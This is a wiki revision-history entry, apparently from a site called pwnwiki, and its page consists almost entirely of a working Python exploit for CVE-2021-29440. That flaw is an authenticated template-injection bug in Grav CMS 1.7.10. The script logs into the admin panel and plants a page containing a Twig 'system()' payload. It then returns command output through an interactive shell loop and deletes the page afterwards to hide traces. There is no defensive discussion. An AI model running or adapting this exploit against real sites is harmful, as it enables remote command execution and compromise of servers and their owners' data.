https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-29440_Grav_CMS_1.7.10_%E6%9C%8D%E5%8B%99%E5%99%A8%E7%AB%AF%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E
CVE-2021-29440 Grav CMS 1.7.10 服務器端模板注入漏洞 - Revision history
2026-04-16T06:57:40Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-29440_Grav_CMS_1.7.10_%E6%9C%8D%E5%8B%99%E5%99%A8%E7%AB%AF%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=4230&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Title: Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated) # Author: enox # Date: 06-06-2021 # Vendor: https://getgrav.org/ # Software Link..."
2021-06-07T12:10:06Z
<p>Created page with "==EXP== <pre> # Title: Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated) # Author: enox # Date: 06-06-2021 # Vendor: https://getgrav.org/ # Software Link..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Title: Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)<br />
# Author: enox<br />
# Date: 06-06-2021<br />
# Vendor: https://getgrav.org/<br />
# Software Link: https://getgrav.org/download/core/grav-admin/1.7.10<br />
# Vulnerable Version(s): Grav CMS 1.7.10<br />
# CVE: CVE-2021-29440<br />
# Credits: https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities<br />
# NOTES: You need a user who has access to /admin dashboard with page creation privileges.<br />
<br />
#!/usr/bin/python<br />
<br />
import requests<br />
from bs4 import BeautifulSoup<br />
import random<br />
import string<br />
<br />
<br />
username = 'username'<br />
password = 'password'<br />
url = 'http://grav.local'<br />
<br />
<br />
session = requests.Session()<br />
<br />
# Autheticating<br />
## Getting login-nonce<br />
def login(url,username,password):<br />
r = session.get(url + "/admin")<br />
soup = BeautifulSoup(r.text, features="lxml")<br />
nonce = str(soup.findAll('input')[2])<br />
nonce = nonce[47:79]<br />
<br />
## Logging in<br />
payload =f'data%5Busername%5D={username}&data%5Bpassword%5D={password}&task=login&login-nonce={nonce}'<br />
headers = {'Content-Type': 'application/x-www-form-urlencoded'}<br />
r = session.post(url+"/admin",data=payload,headers=headers)<br />
<br />
<br />
# Creating Page for RCE<br />
<br />
def rce(url,cmd):<br />
## Getting form nonce and unique form id<br />
project_name = ''.join(random.choices(string.ascii_uppercase + string.digits, k = 8))<br />
r = session.get(url+f"/admin/pages/{project_name}/:add")<br />
soup = BeautifulSoup(r.text, features="lxml")<br />
nonce = str(soup.findAll('input')[72])<br />
form_id = str(soup.findAll('input')[71])<br />
form_id = form_id[54:86]<br />
nonce = nonce[46:78]<br />
<br />
## Creating Page<br />
headers = {'Content-Type': 'application/x-www-form-urlencoded'}<br />
payload = f'task=save&data%5Bheader%5D%5Btitle%5D={project_name}&data%5Bcontent%5D=%7B%7B+system%28%27{cmd}%27%29+%7D%7D&data%5Bfolder%5D={project_name}&data%5Broute%5D=&data%5Bname%5D=default&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&toggleable_data%5Bheader%5D%5Bprocess%5D=on&data%5Bheader%5D%5Bprocess%5D%5Btwig%5D=1&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={form_id}&form-nonce={nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&data%5Bheader%5D%5Bprocess%5D%5Bmarkdown%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0'<br />
r = session.post(url+f"/admin/pages/{project_name}/:add",data=payload,headers=headers)<br />
<br />
## Getting command output<br />
r = session.get(url+f"/{project_name.lower()}")<br />
if 'SyntaxError' in r.text:<br />
print("[-] Command error")<br />
else:<br />
a = r.text.split('<section id="body-wrapper" class="section">')<br />
b = a[1].split('</section>')<br />
print(b[0][58:])<br />
<br />
<br />
# Cleaning up<br />
## Getting admin-nonce<br />
r = session.get(url + "/admin/pages")<br />
soup = BeautifulSoup(r.text, features="lxml")<br />
nonce = str(soup.findAll('input')[32])<br />
nonce = nonce[47:79]<br />
<br />
## Deleting Page<br />
r = session.get(url+f"/admin/pages/{project_name.lower()}/task:delete/admin-nonce:{nonce}")<br />
<br />
login(url,username,password)<br />
<br />
while True:<br />
cmd = input("$ ")<br />
rce(url,cmd)<br />
</pre></div>
Pwnwiki